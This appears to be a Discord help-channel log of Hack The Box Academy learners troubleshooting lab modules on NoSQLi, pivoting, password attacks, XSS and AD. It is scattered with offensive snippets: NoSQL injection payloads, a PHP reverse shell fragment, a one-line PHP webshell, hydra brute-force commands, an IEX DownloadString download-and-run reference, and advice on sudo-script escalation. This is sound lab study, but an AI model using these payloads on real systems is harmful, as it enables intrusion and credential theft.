did you do the nosql injection module?

no, but i did a box that required it

ok

https://github.com/C4l1b4n/NoSQL-Attack-Suite

will try it thanks 🙂

So there was a box i did that required NoSQLi.

I used this tool, more specifically the bypass tool

it tells you if it's NoSQL injectable, and provides an example injection code

{"username": {"$ne": "dummyusername123"}, "password": {"$ne": "dummypassword123"}}

This is an example of the "injection" the tool provided me.

Hope it works for you!

nope doesnt work :/ false positives

rip

what was the output tho

the section has to be updated...

its a new module too lul

3 months old :/

i guess i can't continue unless it will be updated. i tried every possible payload by hand lmao

honestly kinda surprised sqlmap doesnt have better support for nosql yet

yeah right

nosql apps get more common i guess

its certainly becoming more popular

wdym by false positives btw

it says the param its injectable but its actually not

did it give an example of what you could put in there

yes

username[$ne]=x

but i tried that already

rip then

ig you could brute force manually? XD

xd

seclist has a list of possible nosql injections i believe

used that as well

zamn

maybe some1 in forums has complained b4 asw ell

ill check

nope

You might need to switch to passive mode sometimes cause the server has been configured to prevent directory listing

Thanks!

anytime sir
It doesnt always work tho.

did you try it as get parameter, post parameters, or as json data

the tool i gave him would specify if it's a json injection or not

in the case of the box i did, it was

hence i asked for output

theres a lot of nosql injections where the app defaults to post parameters and you have to manually turn it into a json request for it to get processed properly

really? ill try it out

dont forget to change the content type header too!

yeah burpsuit helps w that

could explain why theres no detailed forum on it

I stumbled upon that switch on a box I did recently. Not all nosql injections require it.

didn't do it 😦

bummer

can i see what the tool outputted for you?

the nosqlbypass thing?

yeah

gotta reinstall one sec

false positives

username%5B%24ne%5D=dummyusername123&password%5B%24ne%5D=dummypassword123

Can you just try putting that there

did you copy past that whole payload, cause thats diff than what you posted you tried earlier

yeah

Thats why i asked for output

like this?

does not work

username[$ne]=dummyusername123&password[$ne]=dummypassword123

?

the same

https://tenor.com/view/daeth-funi-periflight-dies-from-gif-22212023

yeah xd

seems kinda unusual imo

oh haha I see why it wouldnt work

why? 🙂

the param[$ne] technique is a nodejs specific method

ik

the server there is werkzeug python based

damn

so any variant of that was never gunna work

i see

I have read a few problems with the ICMP Tunneling with SOCKS module.

Has anyone had issues at this point, it seems like others were at least able to run autogen

╰─ sudo ./autogen.sh                                                                                                                                ─╯
++ pwd
+ OLD_WD=/home/p3ta/HTB/Academy/pivot/ptunnel-ng
++ dirname ./autogen.sh
+ NEW_WD=.
+ cd .
+ autoreconf -fi
./autogen.sh: line 10: autoreconf: command not found
+ aclocal
./autogen.sh: line 11: aclocal: command not found
+ autoheader
./autogen.sh: line 12: autoheader: command not found
+ automake --force-missing --add-missing
./autogen.sh: line 13: automake: command not found
+ autoconf
./autogen.sh: line 14: autoconf: command not found
+ cd /home/p3ta/HTB/Academy/pivot/ptunnel-ng
+ ./configure
./autogen.sh: line 19: ./configure: No such file or directory

unless it was like a crazy second order nosql injection

looks like you need to install automake

let me try that thanks

hmmm

so Im not personally aware of any python specific nosql shenanigans so presumably if the task really is auth bypass, you should be looking at more standard straightforward nosql auth bypass such as || shenanigans

oh yup just as your image indicates

hmmmmmmmmm

try something like ' || 1==1//

maybe quotes around the 1s, experiment with no quote, double quotes, ect

https://tenor.com/view/crying-emoji-dies-gif-21956120

tried every combination

"Log in failed with given credentials"

also tried at /forgot and /reset

this seems to be a common thing, I am going to dig around a bit for other versions of it, but any suggestiongs.

ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r10.129.202.64 -R22
[sudo] password for ubuntu: 
./ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory

looks like you need to install libcrypto

this is on the pivot box, so HTB's machine not mine

Finally solved the medium lab, thanks for everyone!

You got through this already? I got the same issue trying with MSF and with msfvenom or am i on the wrong path?

on the Vim tutorial in linux, why do none of the commands work how they suggest it to? when I go into Vim, none of the commands suggest work, and when I do 'vimtutor' it just says command not found. What am I doing wrong here?

nvm im dumb

I'm new I need a friend

Hey All

so I tried the reverse shell for HTB: Included

still no luck

cat shell.php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.98'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

This is my php reverse shell

The IP is tun0

I am using HTB Platform

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.98 netmask 255.255.254.0 destination 10.10.14.98
inet6 dead:beef:2::1060 prefixlen 64 scopeid 0x0<global>
inet6 fe80::44a6:9a7:740:5119 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 97 bytes 67443 (65.8 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 114 bytes 15830 (15.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

@fathom pendant

@ocean night

any advice brother

@mild mango

my g is pinging the whole squad

Script with curl and filter looking for what you need. If you need help DM

@shadow nest please do not randomly ping people that appear online

Ok

i thought those were his friends 😭 i cant-

LMAO

sorry guys! lol

hey im doing the linux fund and im at this question that ask about the path to htb-student mail.. i found it in /var/mail but it says im wrong

would anyone be able to assist me in a mounting issue? i dont have a command showmount and when i attempt to mount the shares i found to a directory i created it gives me "bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program."

im using parrot

@supple jackal make sure its full path

sorry but i thought that was the full path

/var/mail/htb-student

would that be the full path

try it 🙂

i did it stil says im wrong

The box was too slow for me to even get a shell on the foothold. I think it was just my internet at the time though. I just tried connecting again and everything is way faster

mmmm maybe its derping out? refresh it all?

so this will be the 10th time i have rfreshed

lol

uhh I see lol.

i thought maybe i was wrong

im not entirely sure what i can and cant say to help. but what you have i have and is good for me.

nvm mind on mine. i installed nfs-common and tried it again. worked fine

so that is right, and i guess i understand paths now lol

I genuinely ignore pings if i'm not expecting them

anyone that can give me a little help on the lab: Password Attacks Lab - Easy

you have tryed to hard close browser and reopen and not just refresh?

turned my hole computer off and went to work for 9hrs

lmao

yeah this one there's no htb-student mail folder

so it's tricky

as in - need to do a bit of research on what /var/mail is

so put it just like /var/mail

you had it right

it's just when you're looking around

im dying of boredom waiting for the bruteforce to go through and getting no results

you don't see the mailbox

which is silly

as it's a fundamental excersize

if what you have in the screenshot doesn't work, try adding another / at the end

nope still nada

this is linux fun in system information section yeah?

yes

if so mine shows you are correct as ive done this

maybe talk to staff memeber? im not sure tbh

no doubt lol

so is the shell GNU

or am i out to lunch for that one

i dont think i can directly give you answers tbh.

which section is it ?

so did msf or a payload with msfvenom work for u then?

yeah it worked for me

GNU is just the GUI (kinda sorta)

just try not to bash your head against the wall

also be careful of rogue spaces they mess ya up real bad when inputting things

i have a question is there anyone who can give me a hand

yeah generally it shouldn't take 5 days to crack something, maybe a day and a half depending on your password list and the specs of your computer. Id really really try to get hashcat to work on your windows machine if you want to make full use of your gpu as most virtualization software will not support gpu passthrough

not sure why you're having that issue to begin with but honestly i'd just abandon ship where trying to use hashcat in a vm is concerned

/bin/bash 🙂

If you say what you want to know, I'm sure you'll find someone who can answer the question.

where is the bash terminal icon?

i am at the very beginning

Active Subdomain Enumeration
When looking for additional dns zones, is there another way to spot them rather than trying to axfr to them one by one? there were 19 A records there where one of them were a zone

This depends a bit on your distribution

Mhm if you're starting from the top

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I have noticed that the ping sweep in the pivot module for windows machines does not really work. at least for me. So I wanted to share what I ran. ||1..254 | % {"x.x.x.$($): $(Test-Connection -count 1 -comp x.x.x.$($) -quiet)"}||

Pivoting, Tunneling, and Port Forwarding - Skills Assessment: Submit the contents of C:\Flag.txt located on the Domain Controller.

Was this flag really that easy where it is ||mounted to the Z: when you log in or was that not suppose to be like that. ||

curses

YOOOO. happy friday foos

i just figured how to get the exploit working on the shells and payloads skills assessment and then xfreerdp just closes

you as well... 48.57% done lol... I was hoping to break 50% today 🙂

Don't know if you got a hint yet but use hydra and the password.list and username.list file that they provide in resources. Use -t 64 in your hydra command. The "t" flag will increase the threading so it's completed in less time. You can also throw on the Verbose flag -V if you want to watch it run. After that let it run for a hot minute (a long time). You should be able to figure it out from there. Sometimes people forget that the lowercase "p" and lower case "l" in the hydra command are used for specific passwords and usernames. So, make sure they are uppercase otherwise it will read your lists as a literal word rather than reading the list itself. Last hint, make sure its a refreshed box because it takes awhile. Hope that helps.

this worked for me
$ dig axfr -f subdomains.txt @<ip>

whats up HTB Crew

I have a technical question regarding connecting to teh target machine that a module spawns, can anyone help with that?

maybe. whats up

I figured it out I have to many instances of openvpn running killed them all muahaha. Thanks for checking in.

lol yea that can do it

May I get some help for AD Enumeration & Attacks - Skills Assessment Part II

Submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host

I have a password and not the hash of the user from the previous question. As port is not open for evil-winrm, rdp or ssh how do I connect with the credentials?

did they go over any other tools in the module that uses a pash the hash attack beside evil-winrm?

sorry

misread

are there any other ports open that would allow a connection with the password?

Need some help on module Active directory enumeration and attacks

section- Attacking Domain Trusts - Child -> Parent Trusts - from Linux

Last question - Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.

been trying to use secretsdump.py but think might be getting the syntax wrong if anone already done this exercise

Anyone on that can assist with the Cross-Site Scripting module? Stuck on the Session Hijacking question.

hi everyone

what do you need help with / what have you tried?

Hi

Im new

hi bro

i have a question for the foot printing DNS section. im using dnsenum to find the FQDN for the x.x.x.203 ip but my lists arent picking it up. any idea which list i should be using? or am i going in the wrong direction

445

do you have a username to go with that password?

SO your doing footpeinting section dns question 1?

last question

Yeah. Was thinking psexec to get a shell but couldn’t remember what port that connection is.

Not in front of the computer at the moment.

445 is SMB. its possible you can upload a reverse shell. not sure how youd be able to start it though

dang didnt take notes on the exercises of this module only did the skill asess but trying to look through dns worldlist see if I can remember which one was used

can somone help me out real fast

that would be helpful. i think ive gone through all the seclists

searched trhough discord again used the fierce wordlist

Use the fierce wordlist
on .dev.

you used it on the dev server?

on kali default location /usr/lib/python3/dist-packages/fierce/lists/

is it not on parrot at all?

can someone please help me do sum

this is like one of the only channels i can type in, sadly

i have the fierce-hostlist

not sure but you can use command <locate fierce> to search for it

true. ill look. thanks

got it. thanks. i think part of it was how i was enumerating too

sweet glad you got it

How unethical would it be to hack and use a rigged for profit gambling site that operates illegally and take your money plus back? Hundreds of thousands....do this question violates the rules of hack the box?

more so its not the right channel

Understood...

Is anybody familiar with KRAKEN? and or FIREKIRIN?

also not relevant to this channel

yo, I have a question

suppose i can run a specific ruby script as sudo, is there a way to piggyback off of it and execute an aditionnal command? Smth like "sudo ruby script.rb + exec /bin/bash"

Hello

Would you mind if I asked you an algorithm question?

pls dm me my friend's id has been hacked

Say that shit again and you will get the boot. This is a warning.

If he has been hacked, he needs to talk to discord themselves

sql injections are so satisfying

Friends

Please help me

How is my name offensive tg

help you with what?

Look at the script, what it does, whether it parses ARGV or ENV, or passes inputs into other commands, look for system or open method calls. sudo will prevent you from passing in certain env variables like RUBYOPT which can be used to tell ruby to load additional files. If you can view /etc/sudoers or /etc/sudoers.d/, that might show you if certain env variables are allowed to be passed through sudo.

Would you mind if I asked you an algorithm question?

I said it.

read the rules

Hi everybody, I'm doing the Hacking Passwords with Hashcat module and i'm stuck in the 'Dictionary Attack' section. I think that I guessed correctly the type of hash they're asking for (MD5 I think), but when I run the command to crack the hash I can't get the correct answer... If someone can help me out i'll appreciate it

#rules they need to be able to easily tag you

Hey guys, I'm pushing this week-old question again as I still yet have to find an answer for it:
On the OSINT: Corporate Recon module, Location section
"What are the city's coordinates where one of the company's offices, "inlanefreight.com" has its headquarters in Germany? (format: 00.0000 N, 0.0000 E) "

I have found the answer (as in the city name) as I have found the UK and US cities and they managed to validate. Sadly the german city does not and I cannot for the life of me get the coords right. The coords I get form google are just a tiny bit of from partial coords I got off a walkthrough I found online.

Did anyone manage to beat that section and has the exact GPS point that is required by the question?

Thanks!

question: assuming i've got an operational simple webshell (e.g. <?php system($_REQUEST[0]); ?> ) can I use the command wget from that webshell to grab a much better webshell assuming i can wget it into the webroot dir? i.e. put get simple php webshell then use that to download the whitewinterwolf webshell.php? I can't seem to get it to work

Have you tried shodan or whois?

yea that's really not the issue. I have the answer. Thing is the question just dosn't want to take it

For the modules, the machines we are attacking do not have internet access

yes sorry I should have made clear I was asking a general question Marcie, not module specific

demonstration:

||city is: Oberhausen. Google gives me these coords for this city: Latitude: 51.4731 Longitude: 6.8807. // The answer is asking for these: 5*.***3 N, 6.***8 E||

Theoretically possible: but that begs the question - how would you execute that shell.

if i wget it into the webroot i should be able to just browse to it?

its offtopic for this channel so you're better off asking in #1024429874246590575 or seeing if someone asked the same or similar ¯_(ツ)_/¯

roger that, cheers,

sometimes i think out loud

Or yaknow

Google

¯_(ツ)_/¯

Are you putting it in the format requested? Looks like the format is asking for 4 decimal places

www.justfuckingoogleit.com

😛

yea I have, but you'll notice my partial answer is just a bit off from my google result

I guess they moved the city center since they made the module :/

Post it in #858470491676737536

Since the correct answer is not the answer they want

Help with Broken Authentication Skills Assessment module please. Here are the things I have done:

• I have found 9 users
• I have figured out how cookies are being created
• I have created a wordlist based on the password policy using rockyou.txt
• I have used the ratelimiting script to bruteforce the 9 user's passwords using the password list I created from the password policy (couldn't find any passwords)

Is there something I am missing? Please reply or DM me if you can help 🙂

google🤓

but you can use safari🤓🤓

Hello friends

Would you mind if I asked you an algorithm question?

thanks for the help, I didn't think of that

Is this related to an academy module?

I have solved the 'question' for DNS-AXFR.py in the DNS enumeration with Python module, but I am trying to understand why I am unable to get the script to work locally and not having to use the pwnbox? I am getting this error locally: nameserver ns1.inlanefreight.com is not an IP address or valid https URL but if I supplied the target machine ip address & nameserver ip addresses (yes I added this all to my hosts file) I get this error: Zone transfer error: SERVFAIL Zone transfer error: SERVFAIL any ideas?

Just seem to be having trouble getting the server to request the script.js from me. Yesterday morning, I kept trying and getting nothing, then 90 minutes in I got 12 requests within 2 seconds. Haven't gotten anything from it since, multiple respawns, tried every format of the XSS I can think of.

hum? 🤔

yea, getting the same results over and over

results:

Hi,
On the assessment of brute force module in service login section.
This is correct for the wordlist of password with cupp ?
I have 3696 password and i have 1320 after filter with 8 characters, number and special character.
It's correct ?
For the username i use username-anarchy with H----- P----- and i have 15 username.
I'm on this assessment since 3 days ...
each time the brute force is too long and either the server stops or it receives too many connection attempt errors.
Please help me 😅

I've different ones

Hey! Can someone help me with with Attacking Common Applications Assessment I? The last question regarding the flag... I was able to use the /cgi to view the directory and get to the flag... However, no command is allowing me to view the contents of the flag.

who is in the live engagement module ?

Figured it out. Not sure why, but the rate_limit.py script was not working correctly, I'm guessing it's because I didn't include the Content-Type header. I ended up using intruder with a rate limit and that worked. If anyone is stuck on this in the future, feel free to message me 🙂

I don't remember that module clearly, but you could try including the surname in CUPP and see if that gives you better results. 👍

I have read on the forum and many user says that is not necessary but i an trying with the surname too. For the moment i have no good result.

for shells and payloads?

Nvm, just figured it out. kinda tricky.

Yup

i just finished that module yesterday so the content is fresh in my mind

what do you need help with?

Hey all, im having trouble with the Password Attacks module. I'm trying to brute force rdp, however I keep erroring out with hydra. Keeps saying All children were disabled due too many connection errors. And the times that it does give me an account, they don't work on rdp. Anyone have this issue? Just want to know if its normal, or if im having a connection issue. I have restarted multiple times, including my own pc -- feel free to response here or dm me. Thank you!

the problem came from my script to sort the word list, I had 1320 words with my python script and using sed in command line I have 1451 !
All is good, 3 days for this error ...

Friends please help me.

Hi, it's me again, can someone help me with the module of Web Services and API attacks: skills assessment.
I'm a bit stuck

Hi, Can anyone help me with the module Cross-Site Script (XSS) ? I am stuck at submitting an answer, seems like xsstrike tool is not completing the scan and stuck.

Which question is it?

Utilize some of the techniques mentioned in this section to identify the vulnerable input parameter found in the above server. What is the name of the vulnerable parameter?

in "XSS Discovery"

which of the two questions in this module

1. Utilize some of the techniques mentioned in this section to identify the vulnerable input parameter found in the above server. What is the name of the vulnerable parameter?

2. What type of XSS was found on the above server? "name only"

https://discordapp.com/channels/473760315293696010/1068939596051787776/1068939596051787776

You can see here, the problem I am facing.

What do you get?

you can also use that https://www.countrycoordinate.com/

Also, can you please elaborate how you did it?

complete the form and then in each variable place one by one this payload <script>alert('XSS')</script>.

I sent you a DM

can someone give me a lead on with password attacks medium lab. succesfully logged in as d user. found the ssh directory and bash_history file but i can't figure out what to do with them.

nvm got root acces by doing something i thought i tried already like 50 times

Something went wrong while sending the verification email. Please contact our support team for more information. can i get some help here

and how do i get tag #1024429874246590575

so i can post in there

Support can be accessed via the green bubble on the bottom right of the page; if you don't see it you'll need to disable adblock

Hello 👋..anyone done with using crackmapexec skill assessment need some assistance,got the users..just stuck on getting cme errors in the next step

Hello, in Active Directory Enumeration & Attacks kerberoasting from linux
the question : What powerful local group on the Domain Controller is the SAPService user a member of?
I got this through manual searching Through Getting local groups via crackmapexec and I looked through them .. i'm looking for an automated query or something that I might use in the future.

Im in the assessment for web attacks, i managed to change the passwords for each user, but i have no clue whats next, do i have to change json to xml or something? Or what route should i go

May I get some help for AD Enumeration & Attacks - Skills Assessment Part II

Submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host

I have a password and not the hash of the user from the previous question. As port is not open for evil-winrm, rdp or ssh how do I connect with the credentials? SMB port open but unable to login to smb with credentials.

DC01 may not be open; to outsiders

Possibly may need to access it somehow as administrator from MS01 box?

just throwing an Idea out there ¯_(ツ)_/¯

haven't done it myself

but I heard AD is the mid-boss of cpts

Understood. Thank you

could you use something other than rdp?

oh, I see,, you literally said As port is not open for evil-winrm, rdp or ssh. that's strange.

again not open publicly is a possibility

hello i dont understand much about discord
shortly i am ready to pay unlimited money for very important job for me that might be easy to you
please dm me for info

No.

if you got the cred for the user on question 9 i'm not sure if you can login because i didn't (just because out of habit) and i don't have any note on can't logging in with this user also there is ||winrm||

if you check the ||uid|| for all user none of the username will have ||admin|| in it but hint the last bit of info at the end will review that

Okay. Not sure what you mean regarding the winrm comment. That port is not open for DC01

if you dump the TGS ticket for the user on question 1 then you should see a list of group that this user is a member of under "MemberOf" and for the "powerful" part i guess you can really only guess based on the group name

my nmap scan show it is, maybe try scanning just that port and with a deep scan tag like the -A tag or the best thing you should do for all windows target lab is always give it a few min for it to fully booted up

{
"uid": "74",
"username": "htb-student",
"full_name": "Paolo Perrone",
"company": "Schaefer Inc"
}
you mean i should look for a hint in usernames?

close but nope i mean you should look for a hint in the stuff beside the username (there is only 2 other)

Oh you are right. It did show up open now. Weird. Still can’t login to it like u said with the credz..will try to perform different nmap scans to see if I can find something else I can connect to.

hint you don't need to "login" via something for the last part, you can just use the previous user for that and also the last hint is do some enum about the user you just got

Copy that. Thank you @vital adder

Has anyone done Introduction to Windows Command Line?

yep what's the issue?

||Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file. || I've been trying the ||where /R C:\Users\htb-student\ waldo.tx||t commando but still cant find it

which section?

Finding Files and Directories

hint your command is right but i don't thing the file is in htb-student user home directory

try running that command for ||C:\users|| instead

Alright

Still nothing

I tried to cd to others users before

but access denied

There was a public dir doe

the command in my note start with cmd.exe /c for some reason i think i was in powershell when i was writing my note

also i don't got the file location in my note and i think you can run cmd as administrator so if you got access denied try that

I don't have access to the other users dir

That the problem :S

It should be in htb-student

cause the question told me to RDP to the server

and search for waldo.txt

yep i just give it a try and run cmd as administrator with the where command worked for me

Alright

Yup, there it is it worked with admin

I found the file now thanks man

Any replacements for Attacking AuthN Mechanisms? 500 cubes is unattainable for me lol

i haven't done that module but for web stuff you should be able to learn it for free from portswigger and if you want to learn the stuff that's similar to the module check the section name and find a material here that is similar https://portswigger.net/web-security/all-materials

Is there someone that could help me in the ffuf module? i'm stuck in filtering result. I'm trying to make the VHOST requests but there is something wrong. if there is someone, please write me in priv :).

your first example is pretty close to the right command so you may want to remove that because of spoiler and hint revisit the ||Bypassing Blacklisted Commands|| section for the last thing your need for your command

which section are you on?

I have been stuck on the same section for a while now, I genuinely think there is something wrong with my lab.

Attacking SQL databases under attacking common services module

oh wait a sec i did ues the same command as your first example in my note and it's worked just fine also no idea about that character because i did use it

what's the issue?

I have tried using sqsh, mysql, impacket and none of them are working for me

to login?

I have no privilege to do anything on any of them, the only one I can login into it sqsh

it wont let me use databases... or switch and the syntax does not make sense

yeah so impacket isn't a tool it's a set of tools (i think) and this target is running mssql (microsoft sql server) not mysql so you can't use mysql to login

Makes sense but yes I tried using mssqlclient.py, just have no priviledge to do anything

im logged unto sqsh now

which is sqlcmd for linux

i can't remember exactly but i think yep for the question and the given user you can't access any databases

exactly... i have no idea what to do....

hint the question is asking for a password so re-check the section for method that can extract password

hmmm okay...

filtering result

so for brute forcing vhost in ffuf you'll need to add -H 'Host: FUZZ.academy.htb'

yes

the prob is in the execution, it doesn't work

oh wait this is the first section that you have to do this so did you add the ip and domain into your hosts file without the port?

yes

/etc/hosts

and for the url did you use http://academy.htb:(port number)/ ?

Obv

oh that's kinda weird shoot me a dm with your command

Oh... I just used the technique and got a hash I think? with responder

can I message you?

how long are the password attacks exercises going to take?

it depends but some took quite some time

i'm going to need more than music to get through these then

as the pw attacks are generally brute force - takes a minute

I'm going through Login Brute Forcing - Skills Assessment - Service Login (it's the last part of the Login Brute Forcing module), and I'm having an issue. Question 1 tells me to "use 'usernameGenerator' to generate potential usernames for the employee." That isn't the tool that was shown to us earlier in the module; the one we actually got some practice with was username-anarchy. I can't locate anything named 'usernameGenerator' on the web or on the vm.

So I go with the username-anarchy tool instead, since that's what we've been shown. None of my attempts to crack the login are working though. They just churn forever until I run out of time on either the VM or the IP I'm supposed to be targeting. I'm sure I have the correct employee name, so the only thing I can think of that might be causing me issues is that the wordlists I've made for the username and password are somehow flawed.

Can anyone help me with this?

I've built a password wordlist with cupp, and trimmed it down to meet the password criteria that are outlined on the login landing page.

sorry for the delay and sure

figured out the solution haha nvm

so for the username list i just use username-anarchy and for the password list if you got the right name you can just put it in cupp a few time, i only put it in ||twice||

That ended up working 🤦

Thank you, I appreciate the tip.

WOW this is going to take a while to finish.

see you in two years

Once you're on the box via winrm you can|| query the membership of a certain group to see who can connect via RDP||. With that username and the provided password list you'll find that enumerating via CME or Hydra will workl 👍🏼

actually does the ssh config for password attacks limit the number of parallel tasks

has anyone run into the issue in the crackmapexec module where --get-file and --put-file don't work? The same commands run in the pwnbox work, but locally on my parrot install, it just gives the normal cme smb $IP output, with no errors or anything

Version difference

I think

Can you add the verbose flag?

cme smb $IP -u grace -p Inlanefreight01! --share Share --get-file /path/file.ps1 /path/file.ps1 --verbose
usage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell] [--verbose] {ldap,mssql,smb,ssh,winrm} ...
crackmapexec: error: unrecognized arguments: --verbose

tried with -v as well, says unrecognized aruments: -v

F

is that my grade?

i fail.

cme is VERY picky about the order of its arguments

--verbose iirc has to be before your smb option

gotcha

9/10 times if cme doesnt work how you expect, youve got the arguments ordered wrong

Sounds frustrating

that's really neat, I learned quite a few things about cme so far today

it's a little frustrating, but w/e

DEBUG Error creating SMBv1 connection to 10.129.28.239: Error occurs while reading from remote(104)

is there any way to force smb2

the --verbose placement is a protip for sure. I won't forget that.

this password mutations exercise is taking way too long.

i've cut it down to 86k lines, attacking FTP now..

and it's doing it at 140 tries/min instead of 2000

I'd installed via pipx and going through the pwnbox vm there is a shellscript in /usr/local/bin that runs /root/.local/bin/poetry, so way to know that right off the bat

ah

yeah

I know this is old but I figured out the problem here. Your CDATA payload is looking for flag.txt. (I did the same thing...)

Holy shit that was a million years ago lol

10/01/2022

YUP! Looking at your screenshot helped me figure out what I was doing wrong though lol

Lol

im doing my first ever --level=5 --risk=3 attack in sqlmap .... just roughly how long will these take? Just so I can plan my lunch break 😛

Sweeet!!!!

Not too long in my experience

ok like 20 mins or something?

Yeah. Probably less I think

Just take a little break and get some food

ok thanks, appreciate it

No prob homie

Anyone done documentation reporting test?

im trying to do this module to understand ssh logins but I cant connect to a port without my connection timing out and the prompt to enter my password doesnt appear pinging the ports also isnt working

which module what section

also you can specify ports with ssh which might fix your problem?

Linux Fundamentals very first optional question

*in Sys Info

I feel like I'm having a stroke with trying to find the flag for nmap's service enumeration. I'm not seeing a certain flag. ||I have not tried a UDP scan yet, I'll be trying that now||

I'm not sure if this help but this is how I ssh'd in

sometimes restarting the flag

works

restarting the target*

Hey people!

or resetting your vpn connection

cause i've had it work in pwnbox and not my system

so dc/reconnect to vpn solved

Welcome to hackthebox. Have you read #rules ?

hey Yaoi how's your journey m8?

It's going good. I've been really busy with school lately

~92% rn on CPTS

yeah its my 10th new target xc

oof

hbu?

yeah im gonna try that ive had it on for a few hours now and my internet d/c earlier but I didnt reset the vpn

I've also restarted the target a few times.

but yeah in my experience the version scan should give you the thing or that may be one that you need to nc into if it's that part that i'm thinking of @short horizon

I'm using the attackbox provided

Oooh, I thought it was strictly nmap

tyty but mine didnt give the option for fingerprint to appear

if the module talked about using nc/netcat/ncat

then ncat can generally be used

Welcome! Yep all done, I am new here and I will try to provide as much help as possible!

Sweet! good luck on your hacking journey homie !

😎

💥💥💥

Yep, that was it. I was starting to lose my mind thinking it was a service in the nmap scan xD

destination host unreachable xc

Are you using pwnbox or the vpn?

IT should be a relatively simple fix

I've ssh'd into things a million times

im using open vpn

always works

im sure its something small

im a noob afterall

he meant are you using your own vm

or the htb provided :)

mine

its oracle

virtualbox ye

?

yeah

cause Oracle itself is a huge company that does many things

one of those happens to be a virtual machine hosting software

Java 💢

@fathom pendant

anyway

back to the question at hand

you're connecting to the vpn yeah?

Can it connect to the internet?

sudo openvpn /path/to/vpn.ovpn

Like can you visit websites and shit?

that too

yeah it lets me surf

openvpn is running on your host system; while I don't think that's generally going to be an issue

i've heard it causes issues if you're not running it directly in the vm

👆

ah maybe thats it, it must be something small im too sleep deprived to think about

Try that and see if it works

damn I dont have a vpn software downloaded on the vm

unless it comes with one

There is also support that can help if you still can't get it figured out

openvpn

it's done through the command line zaza

@worn anvil Here is the command to do it. I think openvpn should be installed on parrot by default

Parrot OS comes with OpenVPN installed by default.

also /path/to is a substitute

if you're running the command where you have the ovpn file; you don't need to specify the path

man, i just started this file transfers...the windows section is kind of overwhelming with long commands you have to run

hint: you don't have to run them all

Definitely one of the easier modules in my opinion ngl

lol

there's honestly not much that you HAVE to do in that module

most of it is just "hey practice using these types of commands and figure out which one works best for you"

ok...i saw IEX (New-Object Net.WebClient).DownloadString('https and was like wth

don't worry, the module breaks down the commands in depth so you know what the command does

okay but tbf the IEX webclient one is a really good one to know though

^

And the Invoke-webrequest one

yea im trying to get through it...i have read it like 4 times haha

lol

yeah fair

its the lack of sleep my mind is on fire

its probably because going from Linux all the time, then going right into this...its like woah

also tyty to all of you

tbf

a LOT of the linux commands CAN be used in Powershell

glad to help : D

just because a shell is a shell is a shell

i'm running out of mutated passwords to check on Password Attacks - Password Mutations

you used the provided list yeah?

and mutated that?

:)

i got the custom rule and the passwords.list

ye

ok

good xD

ran it through hashcat and did a sort -u

seen too many people get tripped up that

i don't think that was necessary unless you were told to do so

cause iirc most people cut the first 17k lines :)

and made the process 10x faster

yeah i tried that and it made me question my methods

you know what i'll try it one more time

cut 17k lines with sed -e '1,17000d' < mut_password.list > mut_password_cut.list

||hydra -l sam -P mut_password_cut.list -t 64 ftp://<ip>||

In Module SQLMap, Section Attack Tuning, Question 2 (case #6), the hint suggests using a prefix, which is fine I can do that. Aside from reading the hint, is there any way I could have known to use that particular prefix?

probably something about the question itself would have helped :p

but that's just a theory

i have to be making a mistake somewhere but where the hell is it!?

i'm waiting 15 minutes for hydra going at 2300 tries/min

lmao its still not working

anyone have an idea where i can use an ipmi hash?

@dim cosmos dm'd you i'll help with sql

you crack the hash

password likely to be for a valid user elsewhere on the system.

might be able to interact with the ipmi service itself but idk too much about that

hey ya i couldn't find anything googling about how to use an ipmi hash. this documenting and reporting module sucks. theres like a 3 second delay even moving the mouse. idk y they don't make it fast its virtually impossible to use it. trie changing vpn's and all that

the ipmi hash is covered in one of the way early modules

footprinting

Footprintg

yup

for sure i'll check it out thanks

also the "hash" it gives you; don't use that unless you're assuming it's using default creds; use a wordlist in place of the ?1?1?1?1 talked about in that module

you will only need to crack using the wildcards it if it is an HP iLO IPMI hash

i cut the first 17000 lines and i'm not getting a hit

ok thanks guys

@dim wolf have you done documenting and reporting?

no.

kk

just ask bro

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

what does "Error! reCaptcha Validation failed" means when u try to register for the hackthebox acct for the 1st time

it means there was a Captcha that you didn't do

easy as that

really.. surviving the dark web torture session wasn't as ez as it seem

there was no pop up to see if I am human or bot

so I am unable to regsiter

guess it's a skill issue man; maybe your adblocker is blocking it or something?

lemme try this on tor

lol unless htb is blocked by your isp/country no real need or reason to access it via tor

Im a noob I am not afraid of 14th dark web torture abuse session

nvm

wait wth is this

???

nothing bad is gonna happen by accessing htb

I am trying to access the module nothing more

lol

btw if you're trying to sign up for an academy thing you need to be signing up on https://academy.hackthebox.com/

not https://www.hackthebox.com :)

I suggest reading up on the #rules and #welcome as everything done in this server is all above board whitehat hacking

Im confused on why this doesn't work: I'm doing the WP Skills Assessment and I'm stuck at this question:
Identify the only non-admin WordPress user. (Format: <first-name> <last-name>)
I tried using:
curl GET http://blog.inlanefreight.local/?author=2
which gave me the name ||erika||
But that's it. I can't find a api to make a JSON call too. Im pretty sure this should work though.

Solved it

@fathom pendant @raven cairn I finally go it to connect

thanks again

me too! I can finally find out how the dark web hacked my hardware

Sweeet. What was your issue?

lol good luck with that

Ngl this makes no sense lol

